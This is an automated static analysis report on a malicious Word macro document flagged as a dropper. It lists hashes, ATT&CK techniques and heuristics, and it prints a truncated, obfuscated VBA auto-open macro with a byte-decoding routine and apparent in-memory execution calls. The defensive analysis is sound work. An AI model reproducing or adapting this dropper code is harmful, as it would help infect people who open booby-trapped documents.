Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8cc391596b990ed9…

MALICIOUS

Office (OLE)

221.5 KB Created: 2017-11-14 13:16:00 Authoring application: Microsoft Office Word First seen: 2017-11-20
MD5: 9e62a6632eadbc2cffd5d28a9e415026 SHA-1: 5667ff115721ef06d2a529ba993d9df1c0cf2056 SHA-256: 8cc391596b990ed945280be44b1372b399b58287d31ab751aac0bf27d9c139b6
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The ClamAV detection and heuristic firings indicate this is a dropper, likely intended to download and execute a secondary payload. No specific URLs or executable content were directly extracted, limiting further analysis of the payload.

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-6374504-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6374504-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 40289 bytes
SHA-256: 402018b71b443e23e3f1b4690b93ead1b88fce4a5bb0a2b1473c0a80e2a869d4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function hominoid()
Dim bisulcated As Byte
Dim carnivore As Integer
fibrocalcific.penmanship.Value = Day(#12/5/2013#)
varday = therapeutics = "impulsiveness"
foundered = "decampment"
antisocial = proximate
certified = "stockman"
alula = "splatter"
lycaena = against
counteroffer = "similarly"
courtelle = "huntington"
Set apodidae = fibrocalcific.penmanship.SelectedItem
admiralty = 43 + 40
Pmt 0, admiralty, 27945, 16250, 2
privateer = apodidae.Name
donee = 114 - 59 + 7789
animallike = Right(privateer, donee)
omnifarious = converted(animallike)
clap = 4 + 51
Pmt 0, clap, 9684, 37824, 2
kismet = "aspergillosis"
baldacchino = "lygaeidae"
#If (105 - 82 + 377 + 74 - 27 + 253) > ((91 - 23 + 252) - (101 - 87 + 526) * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim worrying As Variant
Dim ravenous As LongPtr
Dim anisoptera As LongPtr
Dim compo As Integer
Dim gecko As Long
Dim desmidium As LongPtr
Dim buttonhole As LongPtr
Dim yager As LongPtr
bacchanal = 76 - 80 + 2068
#End If
#If (105 - 82 + 377 + 74 - 27 + 253) > ((91 - 23 + 252) - (101 - 87 + 526) * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim chronologer As Byte
Dim anisoptera As Long
Dim finetoothed As String
Dim ravenous As Long
Dim desmidium As Long
millenarianism = 47 - 44 + 778
Dim buttonhole As Long
Dim yager As Long
bacchanal = millenarianism + 3459
#End If
knobble = 46 - 56 + 10
detritus = "conilurus"
beneficially = 17 - 100 + 4179
ascend = 40 + 38
Pmt 0, ascend, 35503, 42179, 4
combed = partout
concise = "straightbacked"
seines = "dairying"
hypsiprymnodon = 37 + 38
Pmt 0, hypsiprymnodon, 27591, 53253, 2
miscue = omnifarious
victim = "abomination"
ravenous = scrap(miscue)
gastrocybe = embolismal
bountiful = "epithalamium"
Dim intentionality As Integer
Dim innkeeper As Integer
desmidium = 8 - 25 + 17
anisoptera = ravenous + bacchanal
buttonhole = 91 - 60 + 201496
yager = 68 - 120 + 3552
accompanied = autosomal(buttonhole, desmidium, anisoptera, desmidium, desmidium, desmidium, desmidium)
odzookens = 22 + 33
Pmt 0, odzookens, 28400, 15052, 2
End Function
Function converted(grimy) As String
Dim rewarding() As Byte
Dim pianistic As Long
Dim brassard(63) As Long
Dim cloisters(63) As Long
Dim achromatin As Long
Dim bibliography(6962) As Byte
Dim arguer As Long
Dim prophet As Long
Dim bargee(63) As Long
fame = 17 - 95 + 65358
metaphrastic = 114 - 18 + 65440
fracas = 99 - 12 + 16711593
nix = 86 - 106 + 276
anorthite = 128 - 28 - 36
meristem = 128 - 44 + 262060
historiography = 1 - 48 + 302
biologically = 56 - 76 + 4116
Dim sanitaire As String
Dim centipede() As Byte
centipede = VBA.StrConv(grimy, 128)
hiccup = 3 + 12
Pmt 0, hiccup, 22358, 49698, 7
napier = 7840 + 3
heads = vbKeyShift - 12
For carcharhinidae = (3 - 3) To napier
If carcharhinidae Mod (3 - 1) = (4 - 4) Then
centipede(carcharhinidae) = centipede(carcharhinidae) - heads
ElseIf 1 = 1 Then
centipede(carcharhinidae) = centipede(carcharhinidae) - (heads - 1)
End If
Next carcharhinidae
serve = 22 + 33
Pmt 0, serve, 13227, 52276, 8
forewarn = genera
For arguer = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
bargee(arguer) = ascites(arguer, anorthite, 50 + 3)
cloisters(arguer) = ascites(arguer, biologically, 50 + 3)
brassard(arguer) = ascites(arguer, meristem, 50 + 3)
Next arguer
Brightness = 57 + 18
Pmt 0, Brightness, 27386, 20261, 4
rewarding = centipede
academical = 47 + 22
Pmt 0, academical, 18094, 33596, 2
purposive = 19 - 76 + 60
missive = 121 - 120 + 1
For prophet = (5 - 5) To napier
botch = rewarding(prophet)
covert = rewarding(prophet + 2)
bouffant = cloisters(forewarn(rewarding(prophet + 1)))
escalation = bargee(forewarn(covert)) + forewarn(rewarding(prophet + purposive))
pianistic = brassard(forewarn(botch)) + bouffa
... (truncated)